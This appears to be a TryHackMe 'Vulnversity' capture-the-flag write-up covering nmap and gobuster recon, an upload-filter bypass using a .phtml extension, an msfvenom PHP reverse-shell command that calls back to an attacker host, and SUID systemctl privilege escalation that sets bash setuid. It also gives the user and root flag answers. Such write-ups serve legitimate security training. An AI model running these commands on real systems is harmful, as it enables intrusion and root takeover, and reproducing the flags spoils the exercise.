Vulnversity

Recon

 sudo nmap -sS -A -T4 10.10.129.126 -oN initial.nmap 
 
 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:10 EDT
Nmap scan report for 10.10.129.126
Host is up (0.16s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
|   256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
|_  256 3050cb705a865722cb52d93634dca558 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/23%OT=21%CT=1%CU=30210%PV=Y%DS=2%DC=T%G=Y%TM=641C41F
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2023-03-23T08:11:29-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 1s
| smb2-time: 
|   date: 2023-03-23T12:11:30
|_  start_date: N/A

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   169.87 ms 10.8.0.1
2   170.48 ms 10.10.129.126

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.42 seconds

Scan for other ports

sudo nmap -sS -p- -T4 10.10.129.126 -oN full.nmap
Nmap scan report for 10.10.129.126
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes

Nmap done: 1 IP address (1 host up) scanned in 907.61 seconds

Port opened

What version of the squid proxy is running on the machine?

3.5.12

OS Version

Ubuntu

What port is the web server running on?

3333

Directory Busting

gobuster dir -u http://10.10.129.126:3333/ -w /usr/share/wordlists/dirb/big.txt

What is the directory that has an upload form page?

/internal/

Compromise the webserver

Make a php msfvenom payload and try to upload it.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.8.64.134 LPORT=4444 -f raw > shell.php

What common file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.

php

Fuzz allowed extensions with Burp

intercept file upload request in burp. Send to intruder and then select the file extension as parameter(ensure selection after full stop) create a list of php extensions in payload list and check.

cp shell.php shell.phtml

Now upload it and it will be uploaded. but msfvenom shell kept on dying

So generated a php shell from pentest monkey using revshells which worked

What common file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.

php

What extension is allowed?

.phtml

What is the name of the user who manages the webserver?

bill

What is the user flag?

8bd7992fbe8a6ad22a63361004cfcedb

Priv Escalation

search for SUID files

find / -perm -u=s -type f 2>/dev/null

On the system, search for all SUID files. What file stands out?

/bin/systemctl

Check GTFOBINS to exploit it and we have a working exploitation method

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

We can also directly cat out the flag using the command in the following manner

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

PreviousTry Hack Me NextBasic Pentesting

Last updated 2 years ago